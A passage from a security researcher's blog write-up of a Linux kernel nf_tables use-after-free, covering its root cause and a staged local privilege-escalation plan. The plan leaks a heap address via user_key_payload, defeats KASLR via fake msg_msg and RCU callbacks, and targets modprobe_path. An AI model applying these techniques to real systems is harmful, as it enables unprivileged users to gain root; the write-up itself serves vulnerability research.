<p>At <code class="language-plaintext highlighter-rouge">[1]</code> we can see the call to <code class="language-plaintext highlighter-rouge">nft_expr_init</code> that eventually results in the <strong>lookup</strong> expression being bound to the set. At <code class="language-plaintext highlighter-rouge">[2]</code> we can see that a check is performed to see if the flag <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> is present. If it is not, execution jumps to <code class="language-plaintext highlighter-rouge">err_set_elem_expr</code>, where <code class="language-plaintext highlighter-rouge">nft_expr_destroy</code> is called at <code class="language-plaintext highlighter-rouge">[3]</code>. <code class="language-plaintext highlighter-rouge">nft_expr_destroy</code> itself calls <code class="language-plaintext highlighter-rouge">nf_tables_expr_destroy</code>, which calls the expression-specific <code class="language-plaintext highlighter-rouge">ops-&gt;destroy</code> function at <code class="language-plaintext highlighter-rouge">[4]</code>.</p>

<p>Let’s look at the lookup expression’s destroy function - <code class="language-plaintext highlighter-rouge">nft_lookup_destroy</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_lookup_destroy</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                   <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">nft_lookup</span> <span class="o">*</span><span class="n">priv</span> <span class="o">=</span> <span class="n">nft_expr_priv</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span>

    <span class="n">nf_tables_destroy_set</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">priv</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">);</span> <span class="c1">// [1]</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">nf_tables_destroy_set</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">nft_set_is_anonymous</span><span class="p">(</span><span class="n">set</span><span class="p">))</span> <span class="c1">// [2]</span>
        <span class="n">nft_set_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span> 
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> in <code class="language-plaintext highlighter-rouge">nft_lookup_destroy</code> a call is made to <code class="language-plaintext highlighter-rouge">nf_tables_destroy_set</code> to destroy the set the expression is bound to <strong>if possible</strong>. At <code class="language-plaintext highlighter-rouge">[2]</code> a check is performed to see if it is safe to destroy the set - if the bindings are empty and the set is anonymous. However, the set won’t be destroyed if it is named or if it has any bindings - and it will always have at least a single binding because the expression got bound to it prior to being destroyed.</p>

<p>So the problem is that in the function <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code> the call to <code class="language-plaintext highlighter-rouge">nft_expr_init</code> is performed <strong>before</strong> it is checked if the expression has the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag. This means that if an expression without the stateful flag is passed, the expression will first be fully initialized and bound to the set, and only then destroyed because the flag is missing.</p>

<p>So what happens when we pass an expression without <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code>? The expression will get bound to the set before the expression gets destroyed. However, the set that it is bound to won’t get destroyed because its bindings are not empty. And as we see in the functions above, nothing handles this case: the destroy path never unlinks the binding. The expression already got bound to the set and it will stay bound. A pointer to it will remain in the <code class="language-plaintext highlighter-rouge">bindings</code> linked list of the set even though the expression got destroyed and its memory got freed. So now the linked list at <code class="language-plaintext highlighter-rouge">set-&gt;bindings</code> contains a pointer to freed memory. A Use-After-Free arises.</p>
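<p>The ordering problem can be illustrated with a small user-space model. It is only a sketch under assumptions, not the kernel code: all names (<code class="language-plaintext highlighter-rouge">expr_model</code>, <code class="language-plaintext highlighter-rouge">model_kfree</code>, <code class="language-plaintext highlighter-rouge">model_expr_alloc</code>, <code class="language-plaintext highlighter-rouge">set_has_dangling_binding</code>) are hypothetical, the caller provides the storage for the expression, and "freeing" only sets a flag so that the stale node can be inspected without touching released memory.</p>

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>

struct list_head { struct list_head *next, *prev; };

struct set_model { struct list_head bindings; };

struct expr_model {
    struct list_head binding;
    bool stateful;  /* stands in for the NFT_EXPR_STATEFUL type flag */
    bool freed;     /* set by model_kfree instead of releasing memory */
};

static void list_init(struct list_head *head)
{
    head->next = head;
    head->prev = head;
}

static void list_add_tail(struct list_head *node, struct list_head *head)
{
    node->prev = head->prev;
    node->next = head;
    head->prev->next = node;
    head->prev = node;
}

/* Assumption: only marks the object, so the model stays well-defined. */
static void model_kfree(struct expr_model *e)
{
    e->freed = true;
}

/* Vulnerable ordering: bind first, check the stateful flag afterwards. */
static int model_expr_alloc(struct set_model *set, struct expr_model *e)
{
    assert(set != NULL && e != NULL);

    /* nft_expr_init -> nft_lookup_init -> nf_tables_bind_set */
    list_add_tail(&e->binding, &set->bindings);

    if (!e->stateful) {
        /* nft_expr_destroy: the set survives and nothing unlinks e. */
        model_kfree(e);
        return -EOPNOTSUPP;
    }
    return 0;
}

/* Walk set->bindings and report whether a node belongs to a freed object. */
static bool set_has_dangling_binding(const struct set_model *set)
{
    const struct list_head *p;

    for (p = set->bindings.next; p != &set->bindings; p = p->next) {
        const struct expr_model *e = (const struct expr_model *)
            ((const char *)p - offsetof(struct expr_model, binding));
        if (e->freed)
            return true;
    }
    return false;
}
```

<p>Passing a non-stateful expression makes <code class="language-plaintext highlighter-rouge">model_expr_alloc</code> fail, yet the set’s list still reaches the "freed" object. In the kernel that object has really been returned to the allocator, which is what makes the stale node dangerous.</p>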

<h2 id="exploitation-">Exploitation <a name="exploitation"></a></h2>
<p>The way this vulnerability is exploited depends on the kernel version of the target. 
If the target is pre-version <code class="language-plaintext highlighter-rouge">5.14</code> there are just <code class="language-plaintext highlighter-rouge">kmalloc-&lt;n&gt;</code> (<code class="language-plaintext highlighter-rouge">KMALLOC_NORMAL</code>) slab caches. From this version on, there are two different types of caches - for accounted objects and unaccounted ones. Accounted objects are allocated using the flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL_ACCOUNT</code> and they go to <code class="language-plaintext highlighter-rouge">kmalloc-cg-&lt;n&gt;</code> (<code class="language-plaintext highlighter-rouge">KMALLOC_CGROUP</code>) caches. Unaccounted objects use the old flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> and go into the legacy <code class="language-plaintext highlighter-rouge">kmalloc-&lt;n&gt;</code> caches. This is important because in later versions, where separate caches are present for accounted and unaccounted objects, the <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression is still unaccounted, i.e. it gets allocated with the flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code>. Therefore, in order to exploit the Use-After-Free vulnerability, the objects that we are going to use as primitives must also be allocated with the <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> flag in versions that use the new <code class="language-plaintext highlighter-rouge">kmalloc-cg-&lt;n&gt;</code> caches.</p>

<p>My goal was to write a version-agnostic exploit. To do that I only used objects that are still allocated with <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> even on newer versions. This way the exploit is viable with the older and newer cache implementations.</p>

<p>The exploit can be divided into three essential stages - leaking a heap address, leaking KASLR and overwriting <code class="language-plaintext highlighter-rouge">modprobe_path</code> to escalate our privileges.</p>

<blockquote>
  <p>It’s important to note that the exploit was tested on 5.12.0 as this was what I had lying around. Version 5.12 predates the introduction of kmalloc-cg-&lt;n&gt; caches.</p>
</blockquote>

<h3 id="requirements-">Requirements <a name="requirements"></a></h3>
<p>To be able to exploit the vulnerability you need <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code>. That shouldn’t be a problem in most cases as that capability can be obtained in a <code class="language-plaintext highlighter-rouge">user+net</code> namespace. So our only requirement is that we can create <code class="language-plaintext highlighter-rouge">user</code> and <code class="language-plaintext highlighter-rouge">network</code> namespaces.</p>

<h3 id="leaking-a-heap-address-">Leaking a heap address <a name="heapaddr"></a></h3>
<p>It is essential to be able to leak a heap address as we are going to need one to successfully fool the kernel and bypass some security protections in the KASLR leaking stage but more on that later. Let’s now look into how we are going to leak the heap address.</p>

<p>We already established that the Use-After-Free occurs because we are left with a pointer to the binding of an <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression that has been freed. 
Every expression in <code class="language-plaintext highlighter-rouge">nf_tables</code> is of the abstract type <code class="language-plaintext highlighter-rouge">nft_expr</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 *	struct nft_expr - nf_tables expression
 *
 *	@ops: expression ops
 *	@data: expression private data
 */</span>
<span class="k">struct</span> <span class="n">nft_expr</span> <span class="p">{</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span>	<span class="o">*</span><span class="n">ops</span><span class="p">;</span> <span class="c1">// nft_lookup_ops in our case (8 bytes)</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>			<span class="n">data</span><span class="p">[]</span> <span class="c1">// this holds the nft_lookup object </span>
		<span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span> <span class="c1">// aligned 8 bytes</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">nft_lookup</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_set</span>			<span class="o">*</span><span class="n">set</span><span class="p">;</span> <span class="c1">// @8 (8 bytes) </span>
	<span class="n">u8</span>				<span class="n">sreg</span><span class="p">;</span> <span class="c1">// @16 (1 byte)</span>
	<span class="n">u8</span>				<span class="n">dreg</span><span class="p">;</span> <span class="c1">// @17 (1 byte)</span>
	<span class="n">bool</span>				<span class="n">invert</span><span class="p">;</span> <span class="c1">// @18 (also takes at least a byte)</span>
	<span class="k">struct</span> <span class="n">nft_set_binding</span>		<span class="n">binding</span><span class="p">;</span> <span class="c1">// @24 (16 bytes)</span>
	<span class="c1">// @24 because 8-byte aligned because first member is a pointer</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">nft_set_binding</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span>		<span class="n">list</span><span class="p">;</span> <span class="c1">// @24; (2 pointers - 16 bytes)</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_chain</span>		<span class="o">*</span><span class="n">chain</span><span class="p">;</span> <span class="c1">// @40 (8 bytes)</span>
	<span class="n">u32</span>				<span class="n">flags</span><span class="p">;</span> <span class="c1">// @48 (4 bytes)</span>
<span class="p">};</span>

</code></pre></div></div>
<p>Here the <code class="language-plaintext highlighter-rouge">data</code> in <code class="language-plaintext highlighter-rouge">nft_expr</code> holds <code class="language-plaintext highlighter-rouge">struct nft_lookup</code>. The size of <code class="language-plaintext highlighter-rouge">struct nft_expr</code> whenever it holds an expression of type <code class="language-plaintext highlighter-rouge">nft_lookup</code> is <code class="language-plaintext highlighter-rouge">0x34 = 52 bytes</code>. This indicates allocation in <code class="language-plaintext highlighter-rouge">kmalloc-64</code>. 
Therefore we are looking for primitives also in <code class="language-plaintext highlighter-rouge">kmalloc-64</code> that are being allocated with <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> on versions with separate slab caches.</p>

<h4 id="method-of-exploitation-">Method of Exploitation <a name="heapaddrmethod"></a></h4>
<p>In order to leak a heap address we have to trigger the writing of a heap address into the freed memory object. That is trivially done by adding two <code class="language-plaintext highlighter-rouge">nft_lookup</code> expressions one after the other that target the same set. Let’s call those two lookup expressions <code class="language-plaintext highlighter-rouge">Object 1</code> and <code class="language-plaintext highlighter-rouge">Object 2</code>.
As we already established, all the lookup expressions that target a certain set are in a linked list through their <code class="language-plaintext highlighter-rouge">bindings</code>. 
If we add a lookup expression without the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag it will get bound to the set through its <code class="language-plaintext highlighter-rouge">binding</code> and then freed - this is our <code class="language-plaintext highlighter-rouge">Object 1</code>. Now if we add a second lookup expression (<code class="language-plaintext highlighter-rouge">Object 2</code>) that targets the same set it will also be added to the same linked list. Therefore now the set and both of these lookup expressions are in a linked list together. This means that the <code class="language-plaintext highlighter-rouge">binding.next</code> pointer of <code class="language-plaintext highlighter-rouge">Object 1</code> is going to hold the address of the <code class="language-plaintext highlighter-rouge">binding</code> of <code class="language-plaintext highlighter-rouge">Object 2</code>. However, as we know <code class="language-plaintext highlighter-rouge">Object 1</code> got freed prior to the allocation of <code class="language-plaintext highlighter-rouge">Object 2</code>. Therefore if we allocate an object we control (<code class="language-plaintext highlighter-rouge">Fake Object 1</code>) in the same space in memory where <code class="language-plaintext highlighter-rouge">Object 1</code> got previously allocated now we have control over the memory where <code class="language-plaintext highlighter-rouge">Object 1</code> is supposed to be. Consequently when <code class="language-plaintext highlighter-rouge">Object 2</code> gets added the kernel thinks it is writing its address to the <code class="language-plaintext highlighter-rouge">binding.next</code> of <code class="language-plaintext highlighter-rouge">Object 1</code> but in reality, it is writing it somewhere in the scope of <code class="language-plaintext highlighter-rouge">Fake Object 1</code> that we control and can read from.</p>

<p>It is important to mention here that the object we choose to allocate as <code class="language-plaintext highlighter-rouge">Fake Object 1</code> must land in <code class="language-plaintext highlighter-rouge">kmalloc-64</code> and be allocated with <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code>.</p>

<p>Summarizing:</p>
<ul>
  <li>Allocate a lookup expression (<code class="language-plaintext highlighter-rouge">Object 1</code>) without the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag targeting <code class="language-plaintext highlighter-rouge">Set 1</code>. It will get bound to the set and then freed.</li>
  <li>Initiate an object under our control (<code class="language-plaintext highlighter-rouge">Fake Object 1</code>) that will get allocated at the same memory location where <code class="language-plaintext highlighter-rouge">Object 1</code> was allocated.</li>
  <li>Add another lookup expression (<code class="language-plaintext highlighter-rouge">Object 2</code>) that also targets <code class="language-plaintext highlighter-rouge">Set 1</code>. Now <code class="language-plaintext highlighter-rouge">Object 1.binding</code> and <code class="language-plaintext highlighter-rouge">Object 2.binding</code> are in a linked list. However <code class="language-plaintext highlighter-rouge">Object 1</code> doesn’t exist anymore so actually the address of <code class="language-plaintext highlighter-rouge">Object 2.binding</code> is written in the scope of <code class="language-plaintext highlighter-rouge">Fake Object 1</code>.</li>
  <li>Read <code class="language-plaintext highlighter-rouge">Fake Object 1</code> and leak the address of <code class="language-plaintext highlighter-rouge">Object 2</code>.</li>
</ul>

<p>Now that we have established our methodology for the heap leak, it is time to find a primitive that we can use for <code class="language-plaintext highlighter-rouge">Fake Object 1</code>.</p>

<h4 id="searching-for-a-primitive-">Searching for a primitive <a name="primitive"></a></h4>
<p>Objects used in the POSIX message queue filesystem have commonly been used as primitives due to the high degree of control we possess over them. For example, the <code class="language-plaintext highlighter-rouge">msg_msg</code> could have been a candidate here - we can control its size and reading memory with it is easy.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* one msg_msg structure for each message */</span>
<span class="k">struct</span> <span class="n">msg_msg</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">m_list</span><span class="p">;</span> 
	<span class="kt">long</span> <span class="n">m_type</span><span class="p">;</span>
	<span class="kt">size_t</span> <span class="n">m_ts</span><span class="p">;</span>		<span class="cm">/* message text size */</span>
	<span class="k">struct</span> <span class="n">msg_msgseg</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span>
	<span class="kt">void</span> <span class="o">*</span><span class="n">security</span><span class="p">;</span>
	<span class="cm">/* the actual message follows immediately */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>However, the header of <code class="language-plaintext highlighter-rouge">msg_msg</code> is six 8-byte words or 48 bytes. This means that <code class="language-plaintext highlighter-rouge">binding.next</code>, at offset 24, won’t be overlapping with the readable section (the actual message section) but with <code class="language-plaintext highlighter-rouge">m_ts</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* ipc/msgutil.c */</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">msg_msg</span> <span class="o">*</span><span class="nf">alloc_msg</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">msg_msg</span> <span class="o">*</span><span class="n">msg</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">msg_msgseg</span> <span class="o">**</span><span class="n">pseg</span><span class="p">;</span>
	<span class="kt">size_t</span> <span class="n">alen</span><span class="p">;</span>

	<span class="n">alen</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">len</span><span class="p">,</span> <span class="n">DATALEN_MSG</span><span class="p">);</span>
	<span class="n">msg</span> <span class="o">=</span> <span class="n">kmalloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="o">*</span><span class="n">msg</span><span class="p">)</span> <span class="o">+</span> <span class="n">alen</span><span class="p">,</span> <span class="n">GFP_KERNEL_ACCOUNT</span><span class="p">);</span> <span class="c1">// [1]</span>
	<span class="p">...</span>
	<span class="k">return</span> <span class="n">msg</span><span class="p">;</span>

<span class="nl">out_err:</span>
	<span class="n">free_msg</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span>
	<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> we can see that <code class="language-plaintext highlighter-rouge">msg_msg</code> gets allocated with the flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL_ACCOUNT</code> and that is another reason why it is not viable as a primitive.</p>

<h5 id="struct-user_key_payload-">struct user_key_payload <a name="user_key_payload"></a></h5>
<p>A viable primitive was found in the form of <code class="language-plaintext highlighter-rouge">user_key_payload</code>. It belongs to the kernel’s key management facility. It holds the payload for keys of type <code class="language-plaintext highlighter-rouge">user</code> and <code class="language-plaintext highlighter-rouge">logon</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/keys/user-type.h */</span>
<span class="k">struct</span> <span class="n">user_key_payload</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">rcu_head</span>	<span class="n">rcu</span><span class="p">;</span>		<span class="cm">/* RCU destructor */</span> <span class="c1">// @0 - 16 bytes</span>
	<span class="kt">unsigned</span> <span class="kt">short</span>	<span class="n">datalen</span><span class="p">;</span>	<span class="cm">/* length of this data */</span> <span class="c1">// @16 - 2 bytes</span>
	<span class="kt">char</span>		<span class="n">data</span><span class="p">[]</span> <span class="n">__aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">));</span> <span class="cm">/* actual data */</span> <span class="c1">// @24</span>
<span class="p">};</span>

<span class="cm">/* include/linux/types.h
 * struct callback_head - callback structure for use with RCU and task_work
 * @next: next update requests in a list
 * @func: actual update function to call after the grace period.
 * ...
 */</span>
<span class="k">struct</span> <span class="n">callback_head</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span>
	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">func</span><span class="p">)(</span><span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">head</span><span class="p">);</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">))));</span>
<span class="cp">#define rcu_head callback_head
</span></code></pre></div></div>
<p>Let’s take a look at the function responsible for allocating <code class="language-plaintext highlighter-rouge">user_key_payload</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* security/keys/user_defined.c */</span>
<span class="kt">int</span> <span class="nf">user_preparse</span><span class="p">(</span><span class="k">struct</span> <span class="n">key_preparsed_payload</span> <span class="o">*</span><span class="n">prep</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">user_key_payload</span> <span class="o">*</span><span class="n">upayload</span><span class="p">;</span>
	<span class="kt">size_t</span> <span class="n">datalen</span> <span class="o">=</span> <span class="n">prep</span><span class="o">-&gt;</span><span class="n">datalen</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">datalen</span> <span class="o">&lt;=</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">datalen</span> <span class="o">&gt;</span> <span class="mi">32767</span> <span class="o">||</span> <span class="o">!</span><span class="n">prep</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">)</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

	<span class="n">upayload</span> <span class="o">=</span> <span class="n">kmalloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="o">*</span><span class="n">upayload</span><span class="p">)</span> <span class="o">+</span> <span class="n">datalen</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span> <span class="c1">// [1]</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">upayload</span><span class="p">)</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>

	<span class="cm">/* attach the data */</span>
	<span class="n">prep</span><span class="o">-&gt;</span><span class="n">quotalen</span> <span class="o">=</span> <span class="n">datalen</span><span class="p">;</span>
	<span class="n">prep</span><span class="o">-&gt;</span><span class="n">payload</span><span class="p">.</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">upayload</span><span class="p">;</span>
	<span class="n">upayload</span><span class="o">-&gt;</span><span class="n">datalen</span> <span class="o">=</span> <span class="n">datalen</span><span class="p">;</span>
	<span class="n">memcpy</span><span class="p">(</span><span class="n">upayload</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">,</span> <span class="n">prep</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">,</span> <span class="n">datalen</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">EXPORT_SYMBOL_GPL</span><span class="p">(</span><span class="n">user_preparse</span><span class="p">);</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> we can see that the allocation is performed with the <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> flag, so it is a viable primitive. Let’s take a look at how it overlaps with <code class="language-plaintext highlighter-rouge">nft_expr[nft_lookup]</code>.</p>
<pre><code class="language-txt">nft_expr that holds nft_lookup | user_key_payload
=================================================
0x0: *ops                      | rcu_head.next
0x8: *set                      | rcu_head.func
0x10: sreg/dreg/invert         | datalen
0x18: binding.next             | data[0]
0x20: binding.prev             | data[8]
</code></pre>
<p>We can see here that <code class="language-plaintext highlighter-rouge">binding.next</code> of <code class="language-plaintext highlighter-rouge">nft_lookup</code> overlaps with <code class="language-plaintext highlighter-rouge">data[0]</code> of <code class="language-plaintext highlighter-rouge">user_key_payload</code>. This suits our purposes as the value of <code class="language-plaintext highlighter-rouge">binding.next</code> will be written in <code class="language-plaintext highlighter-rouge">data[0:8]</code>.</p>

<p>So now our exploitation strategy is:</p>
<ul>
  <li>Add a lookup expression (<code class="language-plaintext highlighter-rouge">Obj 1</code>) so it gets bound and then freed.</li>
  <li>Add a user key (<code class="language-plaintext highlighter-rouge">Fake Obj 1</code>) with payload size such that it would get allocated in <code class="language-plaintext highlighter-rouge">kmalloc-64</code> and where the UAF’d expression was.</li>
  <li>Add another lookup expression (<code class="language-plaintext highlighter-rouge">Obj 2</code>) that looks up into the same set. This would populate <code class="language-plaintext highlighter-rouge">binding-&gt;next</code> of <code class="language-plaintext highlighter-rouge">Obj 1</code>. However <code class="language-plaintext highlighter-rouge">Obj 1</code> got UAF’d so the address of <code class="language-plaintext highlighter-rouge">Obj 2</code> will get written into the data portion of <code class="language-plaintext highlighter-rouge">Fake Obj 1</code> that is of type <code class="language-plaintext highlighter-rouge">user_key_payload</code>.</li>
  <li>Read <code class="language-plaintext highlighter-rouge">Fake Obj 1</code> and leak the address of <code class="language-plaintext highlighter-rouge">Obj 2</code>.</li>
</ul>

<h3 id="defeating-kaslr-">Defeating KASLR <a name="defeatingkaslr"></a></h3>
<p>After leaking a heap address our next goal is to leak a <code class="language-plaintext highlighter-rouge">.text</code> address to defeat <code class="language-plaintext highlighter-rouge">KASLR</code>. 
During this stage, we are going to be leveraging the <a href="https://man7.org/linux/man-pages/man7/mq_overview.7.html">message queue subsystem</a> of the kernel as well as the <a href="https://man7.org/linux/man-pages/man7/keyrings.7.html">in-kernel key management and retention facility</a>.</p>

<h4 id="technique-">Technique <a name="technique"></a></h4>
<p>The technique we are going to use to defeat KASLR is explained in detail in my article <a href="https://ysanatomic.github.io/abusing_rcu_callbacks_to_defeat_kaslr/">Abusing RCU callbacks with a Use-After-Free read to defeat KASLR</a>.</p>

<p>The technique in a nutshell as I introduce it in the article is:</p>
<blockquote>
  <p>The technique is possible when we control two objects allocated next to each other in the same slab cache. We must be able to read out-of-bounds through the first object while the second object must have a rcu_head as its first member.
If we make a call to update the second object the kernel will call call_rcu which will populate rcu_head-&gt;func(). Then if we can read OOB through the first object into the second object’s rcu_head without sleeping (as to not let the kernel execute rcu_head-&gt;func() which will free the memory and maybe zero it out if sensitive) we will be able to leak the address in rcu_head-&gt;func() therefore defeating KASLR.</p>
</blockquote>

<h4 id="leaking-an-address-">Leaking an address <a name="leaking"></a></h4>
<p>We are going to trigger an allocation of an expression that gets UAF’d (<code class="language-plaintext highlighter-rouge">Object 1</code>). We make a call to the message queue subsystem to create a message queue. This will result in the allocation of a <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> object (<code class="language-plaintext highlighter-rouge">Fake Object 1</code>). The <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> has to be allocated at the same location where <code class="language-plaintext highlighter-rouge">Object 1</code> that got UAF’d was allocated.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">posix_msg_tree_node</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">rb_node</span>      <span class="n">rb_node</span><span class="p">;</span> <span class="c1">// of size 0x18 = 24 bytes</span>
    <span class="k">struct</span> <span class="n">list_head</span>    <span class="n">msg_list</span><span class="p">;</span> <span class="c1">// @24 (is 16 bytes)</span>
    <span class="kt">int</span>         <span class="n">priority</span><span class="p">;</span> <span class="c1">// @40</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">rb_node</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">long</span>  <span class="n">__rb_parent_color</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">rb_node</span> <span class="o">*</span><span class="n">rb_right</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">rb_node</span> <span class="o">*</span><span class="n">rb_left</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">))));</span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">msg_list</code> of <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> is at offset <code class="language-plaintext highlighter-rouge">24 = 0x18</code> bytes from the start - same as the <code class="language-plaintext highlighter-rouge">list_head</code> of the <code class="language-plaintext highlighter-rouge">nft_set_binding</code> of the <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression.</p>
<pre><code class="language-txt">nft_expr that holds nft_lookup | posix_msg_tree_node
====================================================
0x0: *ops                      | __rb_parent_color
0x8: *set                      | *rb_right
0x10: sreg/dreg/invert         | *rb_left
0x18: binding.next             | msg_list.next
0x20: binding.prev             | msg_list.prev
</code></pre>
<p>This would mean that the address of the binding of any new lookup expression will be written at offset <code class="language-plaintext highlighter-rouge">0x18</code> of the <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> which is <code class="language-plaintext highlighter-rouge">msg_list.next</code>. This gives us a primitive with which we can fool the kernel that an object is a message (<code class="language-plaintext highlighter-rouge">struct msg_msg</code>) and fetch it - potentially leaking any addresses and pointers stored in the object.</p>
<blockquote>
  <p>msg_msg gets allocated with GFP_KERNEL_ACCOUNT and therefore couldn’t be in the same slab cache (KMALLOC_NORMAL) as our nft_lookup expressions. However, that doesn’t stop us from fooling the kernel that an object that is in a KMALLOC_NORMAL cache is actually of type msg_msg - which is exactly what we are doing.</p>
</blockquote>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">msg_msg</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">m_list</span><span class="p">;</span> <span class="c1">// @0</span>
	<span class="kt">long</span> <span class="n">m_type</span><span class="p">;</span> <span class="c1">// @16</span>
	<span class="kt">size_t</span> <span class="n">m_ts</span><span class="p">;</span>		<span class="cm">/* message text size */</span> <span class="c1">// @24</span>
	<span class="k">struct</span> <span class="n">msg_msgseg</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span> <span class="c1">// @32</span>
